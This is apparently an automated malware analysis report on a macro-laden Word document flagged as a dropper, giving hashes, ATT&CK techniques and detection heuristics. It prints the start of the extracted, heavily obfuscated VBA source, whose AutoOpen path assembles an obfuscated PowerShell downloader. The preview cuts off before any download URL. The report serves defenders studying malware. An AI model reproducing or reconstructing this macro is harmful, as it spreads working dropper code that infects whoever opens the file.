Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef2e6152fe8c0757…

MALICIOUS

Office (OLE)

110.5 KB Created: 2018-02-14 17:03:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: c08672ad8988981e4e2da05cc5b8af80 SHA-1: e208b01a6d2e00e8c53d1f8b9c025a326c280c0e SHA-256: ef2e6152fe8c07575ff05966bb8ca0f42fd820efb37de8431033312e6223924b
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious OLE document containing VBA macros. The critical heuristics indicate the presence of a Shell() call within the AutoOpen macro, which is designed to execute arbitrary commands. This strongly suggests the document's purpose is to download and execute a secondary payload, a common dropper behavior.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6448970-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448970-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27644 bytes
SHA-256: 239d3ab629bbc3d4d01e38a553fd89ee5cc129f8d768d6802a5834eddb8617e4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iChYPQuwno"
Function TbaUOSFU()
On Error Resume Next
MsQRYc = (TaJEG - Int(XdltQQ) * SktSuEWNnR / Oct(plOsroY) - (oHdMWRuRp - Sin(9580388)))
jaGbzV = (fLvmYCOzUS - Int(qjJuPVrfmwVu) * WoXWAAnjPK / Oct(DtwqpcoEDERz) - (cCYZK - Sin(2264861)))
WcEjPDowluN = (KQUPjirzTfD - Int(WXrVWBpJIQ) * WFrUuwbNWDiam / Oct(jHKlplYAp) - (fljCYUCXta - Sin(9541040)))
pwDJWZ = (cLQqmISPXG) + HJjkJKD("Ft3YU.de5DoCosyPJCc+JCc3+JCc+JCcyP3WnJCc+'+'JCcyP3+'+'yP3lCosOayP3+yP3JCc+JCcdFIyP3+yP3Coslede5KoRhbQti", 3, 93)
irwNdiHqbt = (PRpJSZpBB - Int(hMbYPB) * ouHTSiijjPip / Oct(DOIbuaUniR) - (fWkPsVOidj - Sin(5905444)))
VHMvLLoMP = (KCwiHcjJLMWD - Int(DzdphAGc) * owzSoNAzMvZ / Oct(wYwrMLzIQT) - (hwoWkowiYJiOAl - Sin(7883269)))
danZkTpsv = (VILzbiqFafwU - Int(GTOVwQVzrQKPN) * STKzG / Oct(WdzFTYDGi) - (EqbsRpPsDVTois - Sin(89042)))
dkXBLpUnP = (XswEznuiXTfR) + HJjkJKD("uXqPUricjtnUWCrbuzNDwjSFspPqc+Pqcublic +yJCc+JCcP3+yP3 zQPqc+PqcD'+'qPdzyPPqc+Pqc3+yP3QD + ryP3+'+'yP'+'3fPqc+PqcSNS'+'Pqc+PqcyP3+yP3JCc+JCcB yP3+yP3JCc+JPqc+PqcCc+aItwCRHZzWW", 26, 139)
ClhzQa = (UjdDRulEizGE - Int(KajwfWwiZoU) * qiIEXi / Oct(jwtutiwnGsk) - (NETOmfUQpV - Sin(1749094)))
nkQHIkt = (uIzbPczKQaYmQ - Int(pOjislpKHBX) * VZDSrLnw / Oct(lkWYdtZOnjjzHp) - (jGdXFk - Sin(267695)))
MTzSOQw = (EzGZHziNzRfEdK - Int(OsQwTVq) * OjziliPt / Oct(joSYXTRQ) - (Shfblc - Sin(4896509)))
wjBlWis = (CYMOQvLU) + HJjkJKD("wtc+PqcyP3+yPqc+PqcP3'+':DAlRTFmSRY", 3, 23)
rttdjzKqaH = (nnzVJq - Int(kEcBMEti) * IAInzHLRnh / Oct(XGrHUZ) - (sEsoG - Sin(1226819)))
YNmJqbaEdwL = (wTnScns - Int(upfEPMj) * jhbjviNUhn / Oct(AZlTuCawnXzLtQ) - (LBbPKsM - Sin(5530779)))
mrshUjHSN = (HiZQUGT - Int(onsmJWlCoNsE) * WhQkSLsSdHo / Oct(ZMPdKdjEOWGYYC) - (qNWiTYikzJ - Sin(6227328)))
ABANvAQd = (YPUprlrYwjNC) + HJjkJKD("vUNvSCwzVvrRWhATDJiOZhMCtRoFEXih(yP3+yP3ryP3+yP3fSyJCc+JC'+'cP3+yP3asfc in rfSPqc+PqcyP3+yPqc+PqcP3ADCXyP3+yP3){yP3+yP3try{ryP3+yP3fSPqc+PqcyP3+yPqc+PqcP3YyP3+yPhwp", 32, 130)
TcJnt = (ASAbrLQ - Int(CEHdVZubSTd) * ldvLZUjRUU / Oct(suHXMkVRUmOX) - (DDiQqiD - Sin(1052844)))
iKVoY = (IbWWoBXbwMiQOi - Int(BiqwCIp) * FhHWmTblQ / Oct(sljApvTutnC) - (zpUUOIrHDqTER - Sin(7905317)))
QAlitcnNail = (fkIXaRiWzhA - Int(udIPBUPkSCRFS) * JfBRbjAOoJkPb / Oct(OSXnNPwdu) - (RkBEPdTDEj - Sin(1673219)))
mBJwOSo = (pkKWZdk) + HJjkJKD("KkAzJc)Pqc)  -REPLace([c'+'har]99+[char]'+'65+[char]5'+'7),[char]1vFwjwFKBJoCf", 6, 61)
HIWBWHBX = (fkazrhvzLqhKvP - Int(zrhvWQo) * wfrJiPwoLAjdSu / Oct(OjzhiIwbwdJ) - (nzvhj - Sin(8201328)))
cbDsYjsz = (iUAYMjMBWJMl - Int(CMTMZjKnzDufZ) * KrPTCmd / Oct(KOLkzRHa) - (krPzbijI - Sin(9478659)))
FVVFaXbakq = (BiRFsnWCKGq - Int(zQmBFB) * ltjYlKoKNjMj / Oct(FGcltIS) - (aOwTbbswMaZiUL - Sin(7349675)))
kCmiDiNK = (pwimssVzfirD) + HJjkJKD("IffikkCbVGHTsWaFrJionaHShsGpwn+JCcP3+yP3AknLzvZIr", 31, 10)
GnLVVUlcW = (FKiwLAInzqu - Int(HfONOURw) * twYAKLTdzdAHkA / Oct(MHQIJJcoJ) - (jVsiUWtik - Sin(2307134)))
DDvCvN = (KwBppKw - Int(uNWftBG) * JmpQH / Oct(cdqaufG) - (YAoHCL - Sin(2968822)))
TspdiMzjncZ = (UziaPKJq - Int(jOSjwuvGvUXwOP) * GnoWqmzu / Oct(qRqmjARUAbNR) - (WcFtAHrrUFjL - Sin(3874178)))
zfOmHnfI = (fDsoAHwiqLi) + HJjkJKD("rpXMLlOhANiwtkATjzKAr]39).RePLaPqc'+'+PqccE(([Ch'+'Ar]6Pqc+Pqc7+[ChAr]111+[ChAr]115),[StrIJCc+JCc'+'Ng][ChAr]96'+').RePLacE(yPJCc+JCc3rfSyP3,yP3GliyP3).JCc+JCcRePLacE(yP3qPdyP3,P'+'qc+PqcHhvN", 20, 168)
XETVOvqAhL = (QMQzlsCw - Int(MGaMYvhAO) * zKdzBkaMpoW / Oct(hKBLKWCb) - (QhXSziNWHWzY - Sin(4095279)))
kwHqkZ = (HmOPM - Int(fNIztYP) * MkKwnqh / Oct(GfDCMphRZu) - (HuYvGqQ - Sin(1825566)))
wInzzpQli = (YXYZS - Int(KWLwk) * WijjMKwqfq / Oct(wMHQopDIX) - (dEiGijJfKFa - Sin(1971733)))
NcQkli = (avCDzmBB) + HJjkJKD("ZVGbMQPU.( $PShoME[4]+$psHoMe[30]+'X')( ((' . (('+'gv Pqc*mdr*Pqc).naMe[3,11,2]-joInPqcPqc) (((P'+'qc((JCc.((VaCdQkzuC", 9, 103)
tvsUNNuvJ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.